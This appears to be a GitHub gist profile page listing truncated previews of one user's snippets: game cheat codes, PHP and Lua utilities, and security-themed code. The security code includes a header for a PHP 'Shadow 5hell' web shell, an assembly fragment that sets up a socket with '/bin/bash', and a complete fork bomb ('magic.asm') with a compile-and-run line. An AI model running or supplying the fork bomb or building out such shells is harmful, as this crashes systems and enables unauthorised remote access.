Skip to content

Instantly share code, notes, and snippets.

View Cvar1984's full-sized avatar
⚠️
This account is under NSA investigation

Bellatrix Lugosi Cvar1984

⚠️
This account is under NSA investigation
View GitHub Profile
<?php
/**
* Shadow 5hell
*
* @category Seucurity
*
* @package Shadow
*
* @author Cvar1984 <[email protected]>
<?php
/**
* BinaryUtils.php
* Copyright (c) 2021 Cvar1984 <[email protected]>
*
* DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
* Version 2, December 2004
*
* Everyone is permitted to copy and distribute verbatim or modified
* copies of this license document, and changing it is allowed as long
<?php
/**
* XorEncrypt.php
* Copyright (c) 2021 Cvar1984 <[email protected]>
*
* DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
* Version 2, December 2004
*
* Everyone is permitted to copy and distribute verbatim or modified
* copies of this license document, and changing it is allowed as long
@Cvar1984
Cvar1984 / ULUS10466.ini
Created June 29, 2021 16:18
PPSSPP CHEATS
_C0 Infinite HP
_L 0x004078C2 0x000000FF
_C0 Instant Kill
_L 0x204081F0 0x00000000
_C0 Max Gold
_L 0x213DFD6C 0x05F5E0FF
_C0 P1 Play As Azazel
_L 0x603FDAF0 0x00000044
_L 0x00020003 0x00000168
_L 0x200002D4 0x2000012C
section .bss
input resb 256
section .rodata
path_name db '/bin/bash', 0; terminate string
struc socket_struct; define structure
sin_family: resw 1
sin_port: resw 1
@Cvar1984
Cvar1984 / magic.asm
Last active February 16, 2021 12:46
section .text
global _start
_start:
mov rax, 57; sys_garpu :)
syscall
jmp _start
; compile: nasm -f elf64 magic.asm && ld magic.o -o magic && ./magic
--[[--
Copyright (c) 2020 Ramdhan Firmansyah
File : electric.lua
Author : Cvar1984 <[email protected]>
Date : 16.12.2020
Last Modified Date: 16.12.2020
Last Modified By : Cvar1984 <[email protected]>
--]]--
local Electric = {};
@Cvar1984
Cvar1984 / adb_input.lua
Created October 28, 2020 20:58
adb shell input.lua
--[[--
Copyright (c) 2020 Ramdhan Firmansyah
File : swipe.lua
Author : Cvar1984 <[email protected]>
Date : 28.10.2020
Last Modified Date: 28.10.2020
Last Modified By : Cvar1984 <[email protected]>
--]]--
exec = os.execute;
local touchscreen = {};
local cron = require 'cron'
relay = {0, 1, 2, 3};
for x in pairs(relay) do
gpio.mode(relay[x], gpio.OUTPUT);
end
pulser = gpio.pulse.build({
{
<?php
/**
* Class: Info
*
*/
class Info
{
/**
* getPhpVersion